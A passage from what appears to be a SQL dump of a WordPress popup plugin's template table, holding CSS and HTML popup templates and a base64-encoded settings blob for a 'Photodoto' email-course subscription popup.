adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}\', endColorstr=\'[bg_color_0]\',GradientType=1 ); /* ie6-9 */\r\n  	[elseif bg_type_0 == \'img\']\r\n  	background-image: url(\"[bg_img_0]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupInner {\r\n      position: relative;\r\n  {% if popup.params.tpl.enb_subscribe or popup.params.tpl.enb_foot_note or popup.params.tpl.enb_sm %}\r\n  	width: 50%;\r\n	[else]\r\n  	width: 100%;\r\n  	[endif]\r\n  	display: table-cell;\r\n}\r\n#ppsPopupShell_[ID] .label-window{\r\n  position:absolute;\r\n    top: 0;\r\n    background-color: rgba(10,10,10,0.6);\r\n    padding-right: 30px;\r\n    left: 40px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupLabel {\r\n  	color: #000;\r\n	font-family: \'Open Sans\', arial;\r\n	font-size: 28px;\r\n	font-weight: 100;\r\n	color: #ffffff;\r\n	text-shadow: #000000 1px 1px 1px;\r\n	margin-top: 15px;\r\n	margin-bottom: 16px;\r\n	padding-left: 20px;\r\n  	line-height: 26px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell {\r\n    bottom: 20px;\r\n    right: 20px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell form {\r\n	text-align: center;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	padding: 11px 24px 10px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=password],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n  	/*background-color: rgba(0,0,0,0.8) !important;\r\n  	padding-left: 10px;\r\n  	font-size: 17px;\r\n  	color: #fff;*/\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect {\r\n	display: table;\r\n  	text-align: left;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	display: table-cell;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel {\r\n	opacity: 0.5;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	width: 100%;\r\n  	background-color: transparent;\r\n  	height: 40px;\r\n  	border: none;\r\n  	font-size: 17px;\r\n  	color: #fff;\r\n  	border-top-right-radius: 3px;\r\n  	border-bottom-right-radius: 3px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	font-family: inherit;\r\n  	height: auto;\r\n    padding-top: 5px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit] {\r\n	[if bg_type_1 == \'color\']\r\n  	background-color: [bg_color_1];\r\n  	background-image: none;\r\n  	[elseif bg_type_1 == \'img\']\r\n  	background-image: url(\"[bg_img_1]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n  	color: #fff;\r\n  	cursor: pointer;\r\n	border: none;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit]:hover {\r\n	box-shadow: inset 1px 1px 3px #666;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\n  	text-align: center;\r\n  	font-family: \'Open Sans\', arial;\r\n 	font-weight: 100;\r\n	color: #ffffff;\r\n	text-shadow: #000000 1px 1px 1px;\r\n  	font-size: 14px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\n  	position:reletive;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose {\r\n	background-repeat: no-repeat;\r\n  	cursor: pointer;\r\n    top: -5px !important;\r\n    right: -5px !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose.ppsPopupClose_lists_black {\r\n 	top: 0 !important;\r\n  	right: 0 !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsFootNote{\r\n	color: #585858;\r\n    font-family: \"Helvetica Neue\",Helvetica,Arial,sans-serif;\r\n    font-size: x-small;\r\n    font-style: italic;\r\n    line-height: 14px;\r\n  	margin: 5px 30px;\r\n}','find-us.png',1,1,1,1,0,0,0,'2015-01-10 17:59:43',29,0),(30,'Photodoto',1,0,'YTozOntzOjQ6Im1haW4iO2E6Mjk6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNToic2hvd19vbl9jbGlja19vbl9lbF9kZWxheSI7czoxOiIwIjtzOjI3OiJzaG93X29uX3Njcm9sbF93aW5kb3dfZGVsYXkiO3M6MToiMCI7czozMzoic2hvd19vbl9zY3JvbGxfd2luZG93X3BlcmNfc2Nyb2xsIjtzOjE6IjAiO3M6Mjg6InNob3dfb25fYWZ0ZXJfaW5hY3RpdmVfdmFsdWUiO3M6MjoiMTAiO3M6MjU6InNob3dfb25fbGlua19mb2xsb3dfZGVsYXkiO3M6MToiMCI7czo4OiJjbG9zZV9vbiI7czoxMDoidXNlcl9jbG9zZSI7czoyNjoiY2xvc2Vfb25fYWZ0ZXJfYWN0aW9uX3RpbWUiO3M6MToiMSI7czoyNToiY2xvc2Vfb25fYWZ0ZXJfdGltZV92YWx1ZSI7czoxOiI1IjtzOjEwOiJzaG93X3BhZ2VzIjtzOjM6ImFsbCI7czoxNDoic2hvd190aW1lX2Zyb20iO3M6NzoiMTI6MDBhbSI7czoxMjoic2hvd190aW1lX3RvIjtzOjc6IjEyOjAwYW0iO3M6MTQ6InNob3dfZGF0ZV9mcm9tIjtzOjA6IiI7czoxMjoic2hvd19kYXRlX3RvIjtzOjA6IiI7czo3OiJzaG93X3RvIjtzOjg6ImV2ZXJ5b25lIjtzOjI5OiJzaG93X3RvX2ZpcnN0X3RpbWVfdmlzaXRfZGF5cyI7czoyOiIzMCI7czozMDoic2hvd190b191bnRpbF9tYWtlX2FjdGlvbl9kYXlzIjtzOjI6IjMwIjtzOjE1OiJjb3VudF90aW1lc19udW0iO3M6MToiMSI7czoxNToiY291bnRfdGltZXNfbWVzIjtzOjM6ImRheSI7czoyMToiaGlkZV9mb3JfZGV2aWNlc19zaG93IjtzOjE6IjAiO3M6MjQ6ImhpZGVfZm9yX3Bvc3RfdHlwZXNfc2hvdyI7czoxOiIwIjtzOjE3OiJoaWRlX2Zvcl9pcHNfc2hvdyI7czoxOiIwIjtzOjEyOiJoaWRlX2Zvcl9pcHMiO3M6MDoiIjtzOjIzOiJoaWRlX2Zvcl9jb3VudHJpZXNfc2hvdyI7czoxOiIwIjtzOjIzOiJoaWRlX2Zvcl9sYW5ndWFnZXNfc2hvdyI7czoxOiIwIjtzOjI0OiJoaWRlX3NlYXJjaF9lbmdpbmVzX3Nob3ciO3M6MToiMCI7czoxODoiaGlkZV9wcmVnX3VybF9zaG93IjtzOjE6IjAiO3M6MTM6ImhpZGVfcHJlZ191cmwiO3M6MDoiIjt9czozOiJ0cGwiO2E6OTc6e3M6NToid2lkdGgiO3M6MzoiNjAwIjtzOjEzOiJ3aWR0aF9tZWFzdXJlIjtzOjI6InB4IjtzOjE4OiJiZ19vdmVybGF5X29wYWNpdHkiO3M6MzoiMC41IjtzOjk6ImJnX3R5cGVfMCI7czo1OiJjb2xvciI7czo4OiJiZ19pbWdfMCI7czowOiIiO3M6MTA6ImJnX2NvbG9yXzAiO3M6NzoiI2ZmZmZmZiI7czo5OiJiZ190eXBlXzEiO3M6NToiY29sb3IiO3M6ODoiYmdfaW1nXzEiO3M6MDoiIjtzOjEwOiJiZ19jb2xvcl8xIjtzOjc6IiM2OThjOGYiO3M6OToiYmdfdHlwZV8yIjtzOjM6ImltZyI7czo4OiJiZ19pbWdfMiI7czo0NDoiW1BQU19BU1NFVFNfVVJMXWltZy9hc3NldHMvcG9wX3N1YnNjcmliZS5qcGciO3M6MTA6ImJnX2NvbG9yXzIiO3M6MDoiIjtzOjk6ImJnX3R5cGVfMyI7czo1OiJjb2xvciI7czo4OiJiZ19pbWdfMyI7czowOiIiO3M6MTA6ImJnX2NvbG9yXzMiO3M6NzoiI2QyZWFlYSI7czo5OiJiZ190eXBlXzQiO3M6NToiY29sb3IiO3M6ODoiYmdfaW1nXzQiO3M6MDoiIjtzOjEwOiJiZ19jb2xvcl80IjtzOjc6IiNmMzNkMmUiO3M6MTA6ImZvbnRfbGFiZWwiO3M6NzoiZGVmYXVsdCI7czoxNjoibGFiZWxfZm9udF9jb2xvciI7czo3OiIjMDAwMDAwIjtzOjEwOiJmb250X3R4dF8wIjtzOjc6ImRlZmF1bHQiO3M6MTc6InRleHRfZm9udF9jb2xvcl8wIjtzOjc6IiMwMDAwMDAiO3M6MTE6ImZvbnRfZm9vdGVyIjtzOjc6ImRlZmF1bHQiO3M6MTc6ImZvb3Rlcl9mb250X2NvbG9yIjtzOjc6IiM1ODU4NTgiO3M6MTU6InJlc3BvbnNpdmVfbW9kZSI7czozOiJkZWYiO3M6MTc6InJlaWRyZWN0X29uX2Nsb3NlIjtzOjA6IiI7czo5OiJjbG9zZV9idG4iO3M6MTE6ImNsYXNzeV9ncmV5IjtzOjc6ImJ1bGxldHMiO3M6ODoicG9wX2ljb24iO3M6MTE6ImxheWVyZWRfcG9zIjtzOjM6InRvcCI7czo5OiJlbmJfbGFiZWwiO3M6MToiMSI7czo1OiJsYWJlbCI7czo1NToiU1RBUlQgTUFLSU5HIE1PTkVZIERPSU5HIFdIQVQgWU9VIExPVkU6IEZSRUUgT0YgQ09VUlNFISI7czo5OiJlbmJfdHh0XzAiO3M6MToiMSI7czo5OiJmb290X25vdGUiO3M6MTE4OiJXZSByZXNwZWN0IHlvdXIgcHJpdmFjeS4gWW91ciBpbmZvcm1hdGlvbiB3aWxsIG5vdCBiZSBzaGFyZWQgd2l0aCBhbnkgdGhpcmQgcGFydHkgYW5kIHlvdSBjYW4gdW5zdWJzY3JpYmUgYXQgYW55IHRpbWUgIjtzOjE1OiJlbmJfc21fZmFjZWJvb2siO3M6MToiMSI7czoxNzoiZW5iX3NtX2dvb2dsZXBsdXMiO3M6MToiMSI7czoxNDoiZW5iX3NtX3R3aXR0ZXIiO3M6MToiMSI7czo5OiJzbV9kZXNpZ24iO3M6NDoiYm94eSI7czo4OiJhbmltX2tleSI7czoxMDoic2xpZGVfZG93biI7czoxMzoiYW5pbV9kdXJhdGlvbiI7czowOiIiO3M6MTM6ImVuYl9zdWJzY3JpYmUiO3M6MToiMSI7czo4OiJzdWJfZGVzdCI7czo5OiJ3b3JkcHJlc3MiO3M6MjM6InN1Yl93cF9jcmVhdGVfdXNlcl9yb2xlIjtzOjEwOiJzdWJzY3JpYmVyIjtzOjE5OiJzdWJfYXdlYmVyX2xpc3RuYW1lIjtzOjA6IiI7czoyMToic3ViX2F3ZWJlcl9hZHRyYWNraW5nIjtzOjA6IiI7czoyMToic3ViX21haWxjaGltcF9hcGlfa2V5IjtzOjA6IiI7czoyNToic3ViX21haWxjaGltcF9ncm91cHNfZnVsbCI7czowOiIiO3M6MTQ6InN1Yl9ncl9hcGlfa2V5IjtzOjA6IiI7czoxNjoic3ViX2dyX2N5Y2xlX2RheSI7czoxOiIwIjtzOjEzOiJzdWJfaWNfYXBwX2lkIjtzOjA6IiI7czoxNToic3ViX2ljX2FwcF91c2VyIjtzOjA6IiI7czoxNToic3ViX2ljX2FwcF9wYXNzIjtzOjA6IiI7czoxNDoic3ViX2FjX2FwaV91cmwiO3M6MDoiIjtzOjE0OiJzdWJfYWNfYXBpX2tleSI7czowOiIiO3M6MTg6InN1Yl9hcl9mb3JtX2FjdGlvbiI7czowOiIiO3M6MTA6InN1Yl9zZ2FfaWQiO3M6MDoiIjtzOjE1OiJzdWJfc2dhX2xpc3RfaWQiO3M6MDoiIjtzOjIxOiJzdWJfc2dhX2FjdGl2YXRlX2NvZGUiO3M6MDoiIjtzOjEzOiJzdWJfc2ZfYXBwX2lkIjtzOjA6IiI7czoxNDoic3ViX2NrX2FwaV9rZXkiO3M6MDoiIjtzOjE0OiJzdWJfbWVtX2FjY19pZCI7czowOiIiO3M6MTU6InN1Yl9tZW1fcHVkX2tleSI7czowOiIiO3M6MTY6InN1Yl9tZW1fcHJpdl9rZXkiO3M6MDoiIjtzOjEwOiJzdWJfZmllbGRzIjthOjI6e3M6NDoibmFtZSI7YTo2OntzOjQ6Im5hbWUiO3M6NDoibmFtZSI7czo0OiJodG1sIjtzOjQ6InRleHQiO3M6NToibGFiZWwiO3M6NDoiTmFtZSI7czo1OiJ2YWx1ZSI7czowOiIiO3M6NjoiY3VzdG9tIjtzOjE6IjAiO3M6OToibWFuZGF0b3J5IjtzOjE6IjAiO31zOjU6ImVtYWlsIjthOjc6e3M6NDoibmFtZSI7czo1OiJlbWFpbCI7czo0OiJodG1sIjtzOjQ6InRleHQiO3M6NToibGFiZWwiO3M6NjoiRS1NYWlsIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMSI7czozOiJlbmIiO3M6MToiMSI7fX1zOjIwOiJzdWJfdHh0X2NvbmZpcm1fc2VudCI7czo2NzoiQ29uZmlybWF0aW9uIGxpbmsgd2FzIHNlbnQgdG8geW91ciBlbWFpbCBhZGRyZXNzLiBDaGVjayB5b3VyIGVtYWlsISI7czoxNToic3ViX3R4dF9zdWNjZXNzIjtzOjI0OiJUaGFuayB5b3UgZm9yIHN1YnNjcmliZSEiO3M6MjE6InN1Yl90eHRfaW52YWxpZF9lbWFpbCI7czoyMjoiRW1wdHkgb3IgaW52YWxpZCBlbWFpbCI7czoyMDoic3ViX3R4dF9leGlzdHNfZW1haWwiO3M6MjI6IkVtcHR5IG9yIGludmFsaWQgZW1haWwiO3M6MTY6InN1Yl9yZWRpcmVjdF91cmwiO3M6MDoiIjtzOjI4OiJzdWJfdHh0X2NvbmZpcm1fbWFpbF9zdWJqZWN0IjtzOjM0OiJDb25maXJtIHN1YnNjcmlwdGlvbiBvbiBbc2l0ZW5hbWVdIjtzOjI1OiJzdWJfdHh0X2NvbmZpcm1fbWFpbF9mcm9tIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czoyODoic3ViX3R4dF9jb25maXJtX21haWxfbWVzc2FnZSI7czoxOTc6IllvdSBzdWJzY3JpYmVkIG9uIHNpdGUgPGEgaHJlZj1cIltzaXRldXJsXVwiPltzaXRlbmFtZV08L2E+LiBGb2xsb3cgPGEgaHJlZj1cIltjb25maXJtX2xpbmtdXCI+dGhpcyBsaW5rPC9hPiB0byBjb21wbGV0ZSB5b3VyIHN1YnNjcmlwdGlvbi4gSWYgeW91IGRpZCBub3Qgc3Vic2NyaWJlIGhlcmUgLSBqdXN0IGlnbm9yZSB0aGlzIG1lc3NhZ2UuIjtzOjMxOiJzdWJfdHh0X3N1YnNjcmliZXJfbWFpbF9zdWJqZWN0IjtzOjM3OiJbc2l0ZW5hbWVdIFlvdXIgdXNlcm5hbWUgYW5kIHBhc3N3b3JkIjtzOjI4OiJzdWJfdHh0X3N1YnNjcmliZXJfbWFpbF9mcm9tIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czozMToic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfbWVzc2FnZSI7czo2NToiVXNlcm5hbWU6IFt1c2VyX2xvZ2luXTxiciAvPlBhc3N3b3JkOiBbcGFzc3dvcmRdPGJyIC8+W2xvZ2luX3VybF0iO3M6MjU6InN1Yl9yZWRpcmVjdF9lbWFpbF9leGlzdHMiO3M6MDoiIjtzOjEzOiJzdWJfYnRuX2xhYmVsIjtzOjIwOiIgSSBXQU5UIFRISVMgQ09VUlNFISI7czoxMzoic3ViX25ld19lbWFpbCI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MTU6InN1Yl9uZXdfbWVzc2FnZSI7czoxMjk6IllvdSBoYXZlIG5ldyBzdWJzY3JpYmVyIG9uIHlvdXIgc2l0ZSA8YSBocmVmPVwiW3NpdGV1cmxdXCI+W3NpdGVuYW1lXTwvYT4sIGhlcmUgaXMgc3Vic2NyaWJlciBpbmZvcm1hdGlvbjo8YnIgLz5bc3Vic2NyaWJlcl9kYXRhXSI7czo4OiJsb2dpbl9ieSI7czo4OiJ1c2VybmFtZSI7czoxODoibG9naW5fcmVkaXJlY3RfdXJsIjtzOjA6IiI7czoxNToibG9naW5fYnRuX2xhYmVsIjtzOjU6IkxvZ2luIjtzOjIzOiJyZWdfd3BfY3JlYXRlX3VzZXJfcm9sZSI7czoxMDoic3Vic2NyaWJlciI7czoxMzoicmVnX2J0bl9sYWJlbCI7czo4OiJSZWdpc3RlciI7czoxMDoicmVnX2ZpZWxkcyI7YToyOntzOjQ6Im5hbWUiO2E6Nzp7czozOiJlbmIiO3M6MToiMSI7czo0OiJuYW1lIjtzOjQ6Im5hbWUiO3M6NDoiaHRtbCI7czo0OiJ0ZXh0IjtzOjU6ImxhYmVsIjtzOjQ6Ik5hbWUiO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIwIjt9czo1OiJlbWFpbCI7YTo3OntzOjQ6Im5hbWUiO3M6NToiZW1haWwiO3M6NDoiaHRtbCI7czo0OiJ0ZXh0IjtzOjU6ImxhYmVsIjtzOjY6IkUtTWFpbCI7czo1OiJ2YWx1ZSI7czowOiIiO3M6NjoiY3VzdG9tIjtzOjE6IjAiO3M6OToibWFuZGF0b3J5IjtzOjE6IjEiO3M6MzoiZW5iIjtzOjE6IjEiO319czoyMDoicmVnX3R4dF9jb25maXJtX3NlbnQiO3M6Njc6IkNvbmZpcm1hdGlvbiBsaW5rIHdhcyBzZW50IHRvIHlvdXIgZW1haWwgYWRkcmVzcy4gQ2hlY2sgeW91ciBlbWFpbCEiO3M6MTU6InJlZ190eHRfc3VjY2VzcyI7czoyNzoiVGhhbmsgeW91IGZvciByZWdpc3RyYXRpb24hIjtzOjIxOiJyZWdfdHh0X2ludmFsaWRfZW1haWwiO3M6MjI6IkVtcHR5IG9yIGludmFsaWQgZW1haWwiO3M6MTY6InJlZ19yZWRpcmVjdF91cmwiO3M6MDoiIjtzOjI4OiJyZWdfdHh0X2NvbmZpcm1fbWFpbF9zdWJqZWN0IjtzOjM0OiJDb25maXJtIHJlZ2lzdHJhdGlvbiBvbiBbc2l0ZW5hbWVdIjtzOjI1OiJyZWdfdHh0X2NvbmZpcm1fbWFpbF9mcm9tIjtzOjE0OiJhZG1pbkBtYWlsLmNvbSI7czoyODoicmVnX3R4dF9jb25maXJtX21haWxfbWVzc2FnZSI7czoxOTY6IllvdSByZWdpc3RlcmVkIG9uIHNpdGUgPGEgaHJlZj1cIltzaXRldXJsXVwiPltzaXRlbmFtZV08L2E+LiBGb2xsb3cgPGEgaHJlZj1cIltjb25maXJtX2xpbmtdXCI+dGhpcyBsaW5rPC9hPiB0byBjb21wbGV0ZSB5b3VyIHJlZ2lzdHJhdGlvbi4gSWYgeW91IGRpZCBub3QgcmVnaXN0ZXIgaGVyZSAtIGp1c3QgaWdub3JlIHRoaXMgbWVzc2FnZS4iO3M6MzE6InJlZ190eHRfc3Vic2NyaWJlcl9tYWlsX3N1YmplY3QiO3M6Mzc6IltzaXRlbmFtZV0gWW91ciB1c2VybmFtZSBhbmQgcGFzc3dvcmQiO3M6Mjg6InJlZ190eHRfc3Vic2NyaWJlcl9tYWlsX2Zyb20iO3M6MTQ6ImFkbWluQG1haWwuY29tIjtzOjMxOiJyZWdfdHh0X3N1YnNjcmliZXJfbWFpbF9tZXNzYWdlIjtzOjY1OiJVc2VybmFtZTogW3VzZXJfbG9naW5dPGJyIC8+UGFzc3dvcmQ6IFtwYXNzd29yZF08YnIgLz5bbG9naW5fdXJsXSI7czoxMzoicmVnX25ld19lbWFpbCI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MTU6InJlZ19uZXdfbWVzc2FnZSI7czoxMjE6IllvdSBoYXZlIG5ldyBtZW1iZXIgb24geW91ciBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPiwgaGVyZSB1cyBtZW1iZXIgaW5mb3JtYXRpb246PGJyIC8+W3N1YnNjcmliZXJfZGF0YV0iO3M6NToidHh0XzAiO3M6MjgyOiI8cD5Kb2luIG91ciBlbWFpbCBjb3Vyc2UgXCI3IERheXMgdG8gRWFybmluZyBNb3JlIEFzIGEgUGhvdG9ncmFwaGVyXCIgYW5kIGxlYXJuOjwvcD48dWw+PGxpPlRlY2ggdGlwcyB0aGF0IHdpbGwgc2F2ZSB5b3UgJDIuNUsgb24gZXF1aXBtZW50PC9saT48bGk+V2h5IGJhZCBwaG90b2dyYXBoZXJzIG1ha2UgbW9yZSBtb25leSB0aGFuIHlvdTwvbGk+PGxpPk1pc3Rha2VzIGV2ZXJ5IGJlZ2lubmVyIG1ha2VzIGFuZCBob3cgdG8gYXZvaWQgdGhlbS4uLiBhbmQgbXVjaCBtb3JlITwvbGk+PC91bD4iO31zOjEwOiJvcHRzX2F0dHJzIjthOjI6e3M6OToiYmdfbnVtYmVyIjtzOjE6IjUiO3M6MTY6InR4dF9ibG9ja19udW1iZXIiO3M6MToiMSI7fX0=','<link href=\'http://fonts.googleapis.com/css?family=Bitter\' rel=\'stylesheet\' type=\'text/css\'>\r\n<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupListsShell\">\r\n	<a href=\"#\" class=\"ppsPopupClose ppsPopupClose_[close_btn]\"></a>\r\n	<div class=\"ppsInnerTblContent\">\r\n		<div class=\"ppsPopupListsInner ppsPopupInner\">\r\n			[if enb_label]\r\n				<div class=\"pop_form__title\">\r\n				<div class=\"ppsPopupLabel ppsPopupListsLabel\">[label]</div>\r\n				</div>\r\n			[endif]\r\n			<div style=\"clear: both;\"></div>\r\n			<div class=\"text-block\">\r\n				<div class=\"logo\"> \r\n					<div class=\"logo-img\"> </div>\r\n				</div>\r\n				[if enb_txt_0]\r\n					<div class=\"ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_0 ppsPopupTxt_0\">\r\n					[txt_0]\r\n					</div>\r\n				[endif]\r\n			</div>\r\n			[if enb_subscribe]\r\n				<div class=\"ppsSubscribeShell\">\r\n					[sub_form_start]\r\n					[sub_fields_html]\r\n					<input class=\"butt\" type=\"submit\" name=\"submit\" value=\"[sub_btn_label]\" />\r\n					[sub_form_end]\r\n					<div style=\"clear: both;\"></div>\r\n				</div>\r\n			[endif]\r\n			<div style=\"clear: both;\"></div>\r\n			[if enb_sm]\r\n				<div style=\"clear: both;\"></div>\r\n				<div class=\"ppsSm\">\r\n				[sm_html]\r\n				</div>\r\n			[endif]\r\n			[if enb_foot_note]\r\n				<div class=\"ppsFootNote\">\r\n				[foot_note]\r\n				</div>\r\n			[endif]\r\n		</div>\r\n	</div>\r\n</div>','#ppsPopupShell_[ID] {\r\n	width: [width][width_measure];\r\n  	font-family: \'arial\', arial;\r\n	font-size: 13px;\r\n	line-height: 21px;\r\n	font-weight: normal;\r\n}\r\n#ppsPopupShell_[ID] .ppsInnerTblContent {\r\n	border: 5px solid #fff;\r\n    border-radius: 10px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupInner {\r\n  {% if popup.params.tpl.enb_subscribe or popup.params.tpl.enb_foot_note or popup.params.tpl.enb_sm %}\r\n  	width: 100%;\r\n  	border-radius: 4px;\r\n	[else]\r\n  	width: 100%;\r\n  	[endif]\r\n	[if bg_type_0 == \'color\']\r\n	background: -moz-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ff3.6+ */\r\n	background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}), color-stop(100%, [bg_color_0])); /* safari4+,chrome */\r\n	background:-webkit-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* safari5.1+,chrome10+ */\r\n	background: -o-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* opera 11.10+ */\r\n	background: -ms-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ie10+ */\r\n	background:radial-gradient(ellipse at center, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}\', endColorstr=\'[bg_color_0]\',GradientType=1 ); /* ie6-9 */\r\n  	[elseif bg_type_0 == \'img\']\r\n  	background-image: url(\"[bg_img_0]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .pop_form__title {\r\n    [if bg_type_1 == \'color\']\r\n  	background: [bg_color_1] 100%;\r\n  	[elseif bg_type_1 == \'img\']\r\n  	background-image: url(\"[bg_img_1]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n    font-size: 24px;\r\n    color: #FFF;\r\n    line-height: 28px;\r\n    text-transform: uppercase;\r\n    font-family: \'Scolar Bold\';\r\n    text-align: center;\r\n    padding: 20px 0px;\r\n    border-radius: 5px 5px 0px 0px;\r\n    -moz-border-radius: 5px 5px 0px 0px;\r\n    -webkit-border-radius: 5px 5px 0px 0px;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupLabel {\r\n    padding: 5px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell form {\r\n	padding: 1% 1% 1% 1%;\r\n	text-align:right;\r\n	margin-bottom: 20px;\r\n  	padding-left: 20px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	/*width: 100%;*/\r\n  	margin-bottom: 10px;\r\n  	height: 40px;\r\n  	border: 0px solid #d1b36d;\r\n	border-radius: 4px !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=password],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	box-shadow: 2px 2px 2px #dcdcdc inset;\r\n  	padding-left: 20px;\r\n  	font-size: 17px;\r\n	width: 100%;\r\n  	max-width: 284px;\r\n	display: block;\r\n	float: left;\r\n    color: #7f7f7f;\r\n  	background-color: #fff;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect {\r\n	display: table;\r\n  	text-align: left;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	display: table-cell;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel {\r\n	opacity: 0.5;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	width: 100%;\r\n  	background-color: transparent;\r\n  	height: 40px;\r\n  	border: none;\r\n  	font-size: 17px;\r\n	border-top-right-radius: 4px;\r\n  	border-bottom-right-radius: 4px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	font-family: inherit;\r\n  	height: auto;\r\n    padding-top: 5px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[name=\"email\"] {\r\n	width: 60% !important;\r\n    padding: 12px 15px!important;\r\n    float: left;\r\n    height: auto;\r\n    border-radius: 5px;\r\n    -moz-border-radius: 5px;\r\n    -webkit-border-radius: 5px;\r\n    border: none;\r\n    background: #FFF;\r\n    font-size: 16px;\r\n    color: #7f7f7f;\r\n    margin-right: 0px!important;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit] {\r\n	border-color: #000;\r\n	height: 43px;\r\n  	display:block;\r\n  	float: left;\r\n	margin-left: 10px;\r\n  	[if bg_type_4 == \'color\']\r\n  	background: [bg_color_4] 100%;\r\n   	box-shadow: -4px -4px 0px rgba(0, 0, 0, 0.1) inset;\r\n  	background-image: none;\r\n  	[elseif bg_type_1 == \'img\']\r\n  	background-image: url(\"[bg_img_1]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n  	color: #fff;\r\n    font-size: 16px;\r\n    text-shadow: 